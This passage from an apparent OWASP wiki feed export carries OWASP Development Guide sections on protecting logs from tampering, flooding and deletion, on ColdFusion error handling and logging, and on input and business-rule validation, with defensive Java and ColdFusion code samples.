*Use of hashing technology to create digital fingerprints. The idea is that if an attacker does manipulate the log file, the digital fingerprint will no longer match and an alert will be generated.&lt;br /&gt;
&lt;br /&gt;
*Use of host-based IDS technology where normal behavioral patterns can be 'set in stone'. Attempts by attackers to update the log file through anything but the normal approved flow would generate an exception and the intrusion can be detected and blocked. This is one security control that can safeguard against simplistic administrator attempts at modifications.&lt;br /&gt;
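&lt;br /&gt;
The digital-fingerprint idea above can be sketched as a hash chain: the fingerprint of each entry folds in the fingerprint of the previous one, so altering any earlier entry invalidates every later fingerprint (a minimal Java illustration, not a complete signing scheme):&lt;br /&gt;

```java
import java.security.MessageDigest;

public class LogChain {
    // Digest of entry N depends on entry N and the digest of entry N-1,
    // so altering any line invalidates all fingerprints after it.
    public static byte[] chain(byte[] prevDigest, String entry) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        md.update(prevDigest);
        md.update(entry.getBytes("UTF-8"));
        return md.digest();
    }
}
```

Verifying the chain from a trusted starting digest detects any in-place edit; in practice the running digest would be keyed or periodically signed and stored off-host.&lt;br /&gt;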
&lt;br /&gt;
==False Alarms ==&lt;br /&gt;
&lt;br /&gt;
Taking a cue from the classic 1966 film &amp;quot;How to Steal a Million&amp;quot;, or from Aesop's fable &amp;quot;The Boy Who Cried Wolf&amp;quot;, be wary of repeated false alarms, since they may represent an attacker trying to fool the security administrator into thinking that the technology is faulty and not to be trusted until it can be fixed.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Simply be aware of this type of attack, take every security violation seriously, and always get to the bottom of the cause of event log errors; don't just dismiss errors unless you can be completely sure that they are a technical problem.&lt;br /&gt;
&lt;br /&gt;
===Denial of Service ===&lt;br /&gt;
&lt;br /&gt;
Repeatedly hit an application with requests that cause log entries, multiply this by ten thousand, and the result is a large log file and a possible headache for the security administrator. Where log files are configured with a fixed allocation size, then once full, all logging will stop and an attacker has effectively denied service to your logging mechanism. Worse still, if there is no maximum log file size, an attacker can completely fill the hard drive partition and potentially deny service to the entire system. This is becoming rarer, though, with the increasing size of today's hard disks.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The main defenses against this type of attack are to increase the maximum log file size to a value that is unlikely to be reached, to place the log file on a separate partition from that of the operating system or other critical applications, and, best of all, to deploy a system monitoring application that can set a threshold on your log file size and/or activity and issue an alert if an attack of this nature is underway.&lt;br /&gt;
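&lt;br /&gt;
With java.util.logging, for example, a size limit and rotation count put a hard bound on how much disk a log flood can consume (the file pattern and limits here are illustrative):&lt;br /&gt;

```java
import java.io.IOException;
import java.util.logging.FileHandler;
import java.util.logging.Logger;

public class CappedLogging {
    // Rotate across 5 files of at most 1 MB each, appending on restart.
    // A flood of log events can then fill at most about 5 MB, never the disk.
    public static Logger create(String pattern) throws IOException {
        FileHandler handler = new FileHandler(pattern, 1024 * 1024, 5, true);
        Logger logger = Logger.getLogger("capped");
        logger.addHandler(handler);
        return logger;
    }
}
```

Rotation caps the damage at limit times count bytes; the alerting threshold still belongs in an external monitoring tool.&lt;br /&gt;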
&lt;br /&gt;
==Destruction ==&lt;br /&gt;
&lt;br /&gt;
Following the same scenario as the Denial of Service above, if a log file is configured to cycle round overwriting old entries when full, then an attacker has the potential to do the evil deed and then set a log generation script into action in an attempt to eventually overwrite the incriminating log entries, thus destroying them.&lt;br /&gt;
&lt;br /&gt;
If all else fails, an attacker may simply choose to cover their tracks by purging all log file entries, assuming they have the privileges to perform such actions. This attack would most likely involve calling the log file management program and issuing the command to clear the log, or it may be easier to simply delete the object that receives log event updates (in most cases, this object will be locked by the application). This type of attack makes an intrusion obvious, assuming that log files are being regularly monitored, and has a tendency to cause panic as system administrators and managers realize they have nothing upon which to base an investigation.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Following most of the techniques suggested above will provide good protection against this attack. Keep in mind two things:&lt;br /&gt;
&lt;br /&gt;
*Administrative users of the system should be well trained in log file management and review. 'Ad-hoc' clearing of log files is never advised and an archive should always be taken. Too many times a log file is cleared, perhaps to assist in a technical problem, erasing the history of events for possible future investigative purposes.&lt;br /&gt;
&lt;br /&gt;
*An empty security log does not necessarily mean that you should pick up the phone and fly the forensics team in. In some cases, security logging is not turned on by default and it is up to you to make sure that it is. Also, make sure it is logging at the right level of detail, and benchmark the errors against an established baseline in order to measure what is considered 'normal' activity.&lt;br /&gt;
&lt;br /&gt;
==Audit Trails ==&lt;br /&gt;
&lt;br /&gt;
Audit trails are legally protected in many countries, and should be written to high integrity destinations to prevent casual and motivated tampering and destruction. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Do the logs transit in the clear between the logging host and the destination?&lt;br /&gt;
&lt;br /&gt;
* Do the logs have an HMAC or similar tamper-proofing mechanism to prevent changes from the time of the logging activity to the time of review?&lt;br /&gt;
&lt;br /&gt;
* Can relevant logs be easily extracted in a legally sound fashion to assist with prosecutions?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Only audit truly important events – you have to keep audit trails for a long time, and debug or informational messages are wasteful&lt;br /&gt;
&lt;br /&gt;
* Log centrally as appropriate and ensure primary audit trails are not kept on vulnerable systems, particularly front end web servers&lt;br /&gt;
&lt;br /&gt;
* Only review copies of the logs, not the actual logs themselves&lt;br /&gt;
&lt;br /&gt;
* Ensure that audit logs are sent to trusted systems&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, use write-once media or similar to provide trustworthy long-term log repositories&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, ensure there is end-to-end trust in the logging mechanism. World-writeable logs and logging agents without credentials (such as SNMP traps, syslog, etc.) are legally vulnerable to being excluded as evidence in prosecutions &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Oracle Auditing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sans.org/atwork/description.php?cid=738&amp;lt;/u&amp;gt;   [[category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
* Sarbanes Oxley for IT security&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/columnists/322&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Java Logging Overview&lt;br /&gt;
&amp;lt;u&amp;gt;http://java.sun.com/javase/6/docs/technotes/guides/logging/overview.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Error Handling and Logging ==&lt;br /&gt;
&lt;br /&gt;
All applications have failures, whether they occur during compilation or at runtime. Most programming languages will throw runtime exceptions for illegally executing code (e.g. syntax errors), often in the form of cryptic system messages. If not handled properly, these failures and the resulting system messages can lead to several security risks, including enumeration, buffer attacks, and sensitive information disclosure. If an attack occurs, it is important that forensics personnel be able to trace the attacker’s tracks via adequate logging.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides structured exception handling and logging tools. These tools can help developers customize error handling to prevent unwanted disclosure, and provide customized logging for error tracking and audit trails. These tools should be combined with web server, J2EE application server, and operating system tools to create the full system/application security overview.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Error Handling'''&lt;br /&gt;
&lt;br /&gt;
Hackers can use the information exposed by error messages. Even missing template errors (HTTP 404) can expose your server to attacks (e.g. buffer overflow, XSS, etc.). If you enable the Robust Exception Information debugging option, ColdFusion will display:&lt;br /&gt;
&lt;br /&gt;
Physical path of template &lt;br /&gt;
&lt;br /&gt;
URI of template &lt;br /&gt;
&lt;br /&gt;
Line number and line snippet &lt;br /&gt;
&lt;br /&gt;
SQL statement used (if any) &lt;br /&gt;
&lt;br /&gt;
Data source name (if any) &lt;br /&gt;
&lt;br /&gt;
Java stack trace&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides tags and functions for developers to use to customize error handling. Administrators can specify default templates in the ColdFusion Administrator (CFAM) to handle unknown or unhandled exceptions. ColdFusion’s structured exception handling works in the following order:&lt;br /&gt;
&lt;br /&gt;
Template level (ColdFusion templates and components)&lt;br /&gt;
&lt;br /&gt;
ColdFusion exception handling tags: cftry, cfcatch, cfthrow, and cfrethrow&lt;br /&gt;
&lt;br /&gt;
try and catch statements in CFScript&lt;br /&gt;
&lt;br /&gt;
Application level (Application.cfc/cfm)&lt;br /&gt;
&lt;br /&gt;
Specify custom templates for individual exceptions types with the cferror tag&lt;br /&gt;
&lt;br /&gt;
Application.cfc onError method to handle uncaught application exceptions&lt;br /&gt;
&lt;br /&gt;
System level (ColdFusion Administrator settings)&lt;br /&gt;
&lt;br /&gt;
Missing Template Handler execute when a requested ColdFusion template is not found&lt;br /&gt;
&lt;br /&gt;
Site-wide Error Handler executes globally for all unhandled exceptions on the server&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Do not allow exceptions to go unhandled&lt;br /&gt;
&lt;br /&gt;
*Do not allow any exceptions to reach the browser&lt;br /&gt;
&lt;br /&gt;
*Display custom error pages to users with an email link for feedback&lt;br /&gt;
&lt;br /&gt;
*Do not enable “Robust Exception Information” in production.&lt;br /&gt;
&lt;br /&gt;
*Specify custom pages for ColdFusion to display in each of the following cases: &lt;br /&gt;
**When a ColdFusion page is missing (the Missing Template Handler page) &lt;br /&gt;
**When an otherwise-unhandled exception error occurs during the processing of a page (the Site-wide Error Handler page) &lt;br /&gt;
**You specify these pages on the Settings page in the Server Settings area of the ColdFusion MX Administrator; for more information, see the ColdFusion MX Administrator Help.&lt;br /&gt;
&lt;br /&gt;
*Use the cferror tag to specify ColdFusion pages to handle specific types of errors. &lt;br /&gt;
&lt;br /&gt;
*Use the cftry, cfcatch, cfthrow, and cfrethrow tags to catch and handle exception errors directly on the page where they occur. &lt;br /&gt;
&lt;br /&gt;
*In CFScript, use the try and catch statements to handle exceptions. &lt;br /&gt;
&lt;br /&gt;
*Use the onError event in Application.cfc to handle exception errors that are not handled by try/catch code on the application pages. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Logging'''&lt;br /&gt;
&lt;br /&gt;
Log files can help with application debugging and provide audit trails for attack detection. ColdFusion provides several logs for different server functions. It leverages the Apache Log4j libraries for customized logging. It also provides logging tags to assist in application debugging. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following is a partial list of ColdFusion log files and their descriptions:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
! Log file !! Description&lt;br /&gt;
|-&lt;br /&gt;
| application.log || Records every ColdFusion MX error reported to a user. Application page errors, including ColdFusion MX syntax, ODBC, and SQL errors, are written to this log file.&lt;br /&gt;
|-&lt;br /&gt;
| exception.log || Records stack traces for exceptions that occur in ColdFusion.&lt;br /&gt;
|-&lt;br /&gt;
| scheduler.log || Records scheduled events that have been submitted for execution. Indicates whether task submission was initiated and whether it succeeded. Provides the scheduled page URL, the date and time executed, and a task ID.&lt;br /&gt;
|-&lt;br /&gt;
| server.log || Records start-up messages and errors for ColdFusion MX.&lt;br /&gt;
|-&lt;br /&gt;
| customtag.log || Records errors generated in custom tag processing.&lt;br /&gt;
|-&lt;br /&gt;
| mail.log || Records errors generated by an SMTP mail server.&lt;br /&gt;
|-&lt;br /&gt;
| mailsent.log || Records messages sent by ColdFusion MX.&lt;br /&gt;
|-&lt;br /&gt;
| flash.log || Records entries for Macromedia Flash Remoting.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The CFAM contains the Logging Settings and log viewer screens. Administrators can configure the log directory, maximum log file size, and maximum number of archives. It also allows administrators to log slow running pages, CORBA calls, and scheduled task execution. The log viewer allows viewing, filtering, and searching of any log files in the log directory (default is cf_root/logs). Administrators can archive, save, and delete log files as well.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The cflog and cftrace tags allow developers to create customized logging. &amp;lt;cflog&amp;gt; can write custom messages to the Application.log, Scheduler.log, or a custom log file. The custom log file must be in the default log directory – if it does not exist, ColdFusion will create it. &amp;lt;cftrace&amp;gt; tracks execution times, logic flow, and variable values at the time the tag executes. It records the data in cftrace.log (in the default logs directory) and can display this information either inline or in the debugging output of the current page request. Use &amp;lt;cflog&amp;gt; to write custom error messages, track user logins, and record user activity to a custom log file. Use &amp;lt;cftrace&amp;gt; to track variables and application state within running requests.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cflog&amp;gt; for customized logging&lt;br /&gt;
**Incorporate it into custom error handling&lt;br /&gt;
**Record application-specific messages&lt;br /&gt;
&lt;br /&gt;
*Actively monitor and fix errors in ColdFusion’s logs&lt;br /&gt;
&lt;br /&gt;
*Optimize logging settings&lt;br /&gt;
**Rotate log files to keep them current&lt;br /&gt;
**Keep file sizes manageable&lt;br /&gt;
&lt;br /&gt;
*Enable logging of slow-running pages&lt;br /&gt;
**Set the time interval lower than the configured Timeout Request value in the CFAM Settings screen&lt;br /&gt;
**Long-running page timings are recorded in the server.log&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cftrace&amp;gt; sparingly for audit trails&lt;br /&gt;
**Use it with inline=&amp;quot;false&amp;quot;&lt;br /&gt;
**Use it to track user input – Form and/or URL variables&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices in Action'''''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following code adds error handling and logging to the dbLogin and logout methods from the code in the Authentication section.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, strUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, strPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
		SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
		FROM UserTable&lt;br /&gt;
&lt;br /&gt;
		WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cflog text=&amp;quot;#getAuthUser()# has logged in!&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		  	type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;!--- Add code to get roles from database ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfcatch type=&amp;quot;database&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  	&amp;lt;cflog text=&amp;quot;Error in dbLogin(). #cfcatch.details#&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	  		type=&amp;quot;Error&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			log=&amp;quot;Application&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfcatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;logout&amp;quot; access=&amp;quot;remote&amp;quot; output=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;logintype&amp;quot; type=&amp;quot;string&amp;quot; required=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif isDefined(&amp;quot;form.logout&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflogout&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset StructClear(Session)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	&amp;lt;cflog text=&amp;quot;#getAuthUser()# has been logged out.&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		application=&amp;quot;yes&amp;quot;&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif arguments.logintype eq &amp;quot;challenge&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset foo = closeBrowser()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- replace this URL to a page logged out users should see ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflocation url=&amp;quot;login.cfm&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Error Handling]]&lt;br /&gt;
[[Category:Logging]]&lt;br /&gt;
[[Category:OWASP Logging Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59754</id>
		<title>Data Validation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Data_Validation&amp;diff=59754"/>
				<updated>2009-05-01T12:13:21Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Data Validation and Interpreter Injection */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is robust against all forms of input data, whether obtained from the user, infrastructure, external entities or database systems.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data. All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The most common web application security weakness is the failure to properly validate input from the client or environment. This weakness leads to almost all of the major vulnerabilities in applications, such as [[Interpreter Injection]], locale/Unicode attacks, file system attacks and buffer overflows. Data from the client should never be trusted, because the client has every opportunity to tamper with it.&lt;br /&gt;
&lt;br /&gt;
In many cases, [[Encoding]] has the potential to defuse attacks that rely on lack of input validation. For example, if you use HTML entity encoding on user input before it is sent to a browser, it will prevent most [[Cross-site Scripting (XSS)|XSS]] attacks. However, simply preventing attacks is not enough - you must perform [[Intrusion Detection]] in your applications. Otherwise, you are allowing attackers to repeatedly attack your application until they find a vulnerability that you haven't protected against. Detecting attempts to find these weaknesses is a critical protection mechanism.&lt;br /&gt;
&lt;br /&gt;
==Definitions ==&lt;br /&gt;
&lt;br /&gt;
These definitions are used within this document:&lt;br /&gt;
&lt;br /&gt;
* '''Integrity checks'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data has not been tampered with and is the same as before&lt;br /&gt;
&lt;br /&gt;
* '''Validation'''&lt;br /&gt;
&lt;br /&gt;
Ensure that the data is strongly typed, has correct syntax, is within length boundaries, contains only permitted characters, and that numbers are correctly signed and within range boundaries&lt;br /&gt;
&lt;br /&gt;
* '''Business rules'''&lt;br /&gt;
&lt;br /&gt;
Ensure that data is not only validated, but also correct according to business rules. For example, interest rates must fall within permitted boundaries.&lt;br /&gt;
&lt;br /&gt;
Some documentation and references use these terms interchangeably, which is very confusing to all concerned. This confusion directly causes continuing financial loss to the organization.&lt;br /&gt;
&lt;br /&gt;
==Where to include integrity checks ==&lt;br /&gt;
&lt;br /&gt;
Integrity checks must be included wherever data passes from a trusted to a less trusted boundary, such as from the application to the user's browser in a hidden field, or to a third party payment gateway, such as a transaction ID used internally upon return. &lt;br /&gt;
&lt;br /&gt;
The type of integrity control (checksum, HMAC, encryption, digital signature) should be directly related to the risk of the data transiting the trust boundary. &lt;br /&gt;
&lt;br /&gt;
==Where to include validation ==&lt;br /&gt;
&lt;br /&gt;
Validation must be performed on every tier. However, validation should be performed as per the function of the server executing the code. For example, the web / presentation tier should validate for web related issues, persistence layers should validate for persistence issues such as SQL / HQL injection, directory lookups should check for LDAP injection, and so on.&lt;br /&gt;
&lt;br /&gt;
==Where to include business rule validation ==&lt;br /&gt;
&lt;br /&gt;
Business rules are known during design, and they influence implementation. However, there are bad, good and &amp;quot;best&amp;quot; approaches. Often the best approach is the simplest in terms of code. &lt;br /&gt;
&lt;br /&gt;
===Example - Scenario ===&lt;br /&gt;
&lt;br /&gt;
* You are to populate a list with accounts provided by the back-end system&lt;br /&gt;
* The user will choose an account, choose a biller, and press next&lt;br /&gt;
&lt;br /&gt;
===Wrong way===&lt;br /&gt;
&lt;br /&gt;
The account select option is read directly and provided in a message back to the backend system, without validating that the account number is one of the accounts provided by the backend system.&lt;br /&gt;
&lt;br /&gt;
===Why this is bad===&lt;br /&gt;
&lt;br /&gt;
An attacker can change the HTML in any way they choose:&lt;br /&gt;
&lt;br /&gt;
* The lack of validation requires a round-trip to the backend to provide an error message that the front end code could easily have eliminated&lt;br /&gt;
&lt;br /&gt;
* The back end may not be able to cope with the data payload the front-end code could have easily eliminated. For example, buffer overflows, XML injection, or similar. &lt;br /&gt;
&lt;br /&gt;
===Acceptable Method ===&lt;br /&gt;
&lt;br /&gt;
The account select option parameter (&amp;quot;payee_id&amp;quot;) is read by the code, and compared to an already-known list. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
if (account.hasPayee( session.getParameter(&amp;quot;payee_id&amp;quot;) )) {&lt;br /&gt;
    backend.performTransfer( session.getParameter(&amp;quot;payee_id&amp;quot;) );&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This prevents parameter tampering, but requires the list of possible payee_id values to be calculated beforehand.&lt;br /&gt;
&lt;br /&gt;
===Best Method ===&lt;br /&gt;
&lt;br /&gt;
The original code emitted indexes &amp;lt;option value=&amp;quot;1&amp;quot; ... &amp;gt; rather than account names.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
int payeeLstId = Integer.parseInt(session.getParameter(&amp;quot;payeelstid&amp;quot;));&lt;br /&gt;
accountFrom = account.getAcctNumberByIndex(payeeLstId);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Not only is this easier to render in HTML, it makes validation and business rule validation trivial. The field cannot be tampered with.&lt;br /&gt;
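A sketch of this approach in Java (the class and method names below are illustrative, not from the original example) shows the index-to-account mapping together with the range check needed so that a guessed index outside the rendered list cannot select an account that was never offered:&lt;br /&gt;

```java
import java.util.List;

class PayeeSelector {
    private final List<String> payeeAccounts; // accounts rendered as <option> indexes 0..n-1

    PayeeSelector(List<String> payeeAccounts) {
        this.payeeAccounts = payeeAccounts;
    }

    // Map the submitted list index back to the real account number.
    // Any index outside the rendered range is rejected, so a guessed
    // value such as 9 against a list of 8 entries fails closed.
    String accountForIndex(int idx) {
        if (idx < 0 || idx >= payeeAccounts.size()) {
            throw new IllegalArgumentException("tampered payee index");
        }
        return payeeAccounts.get(idx);
    }
}
```

The submitted value is still validated (it must parse as an integer and fall inside the rendered range); the gain is that the grammar of the field is trivial and the account numbers themselves never leave the server.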
&lt;br /&gt;
&amp;lt;!-- dkaplan: why is this the best?  I can see how it can make things easier to guess.  Where before I had to guess an account name, now I can just put in 9 if I see a list of id's from 1-8 and this code example doesn't directly check the integrity of that.  I think this needs more explanation. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Conclusion ===&lt;br /&gt;
&lt;br /&gt;
To provide defense in depth and to prevent attack payloads from trust boundaries, such as backend hosts, which are probably incapable of handling arbitrary input data, business rule validation is to be performed (preferably in workflow or command patterns), even if it is known that the back end code performs business rule validation.&lt;br /&gt;
&lt;br /&gt;
This is not to say that the entire set of business rules need be applied - it means that the fundamentals are performed to prevent unnecessary round trips to the backend and to prevent the backend from receiving most tampered data.&lt;br /&gt;
&lt;br /&gt;
==Data Validation Strategies ==&lt;br /&gt;
&lt;br /&gt;
There are four strategies for validating data, and they should be used in this order:&lt;br /&gt;
&lt;br /&gt;
===Accept known good===&lt;br /&gt;
&lt;br /&gt;
This strategy is also known as &amp;quot;whitelist&amp;quot; or &amp;quot;positive&amp;quot; validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn't match should be rejected.  Data should be:&lt;br /&gt;
&lt;br /&gt;
* Strongly typed at all times&lt;br /&gt;
* Length checked, with field lengths minimized&lt;br /&gt;
* Range checked if numeric&lt;br /&gt;
* Unsigned unless required to be signed&lt;br /&gt;
* Syntax or grammar checked prior to first use or inspection&lt;br /&gt;
&lt;br /&gt;
If you expect a postcode, validate for a postcode (type, length and syntax):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String isPostcode(String postcode) {&lt;br /&gt;
    return (postcode != null &amp;amp;&amp;amp; Pattern.matches(&amp;quot;^(((2|8|9)\\d{2})|((02|08|09)\\d{2})|([1-9]\\d{3}))$&amp;quot;, postcode)) ? postcode : &amp;quot;&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Coding guidelines should use some form of visible tainting on input from the client or untrusted sources, such as third-party connectors, to make it obvious that the input is unsafe:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String taintPostcode = request.getParameter(&amp;quot;postcode&amp;quot;);&lt;br /&gt;
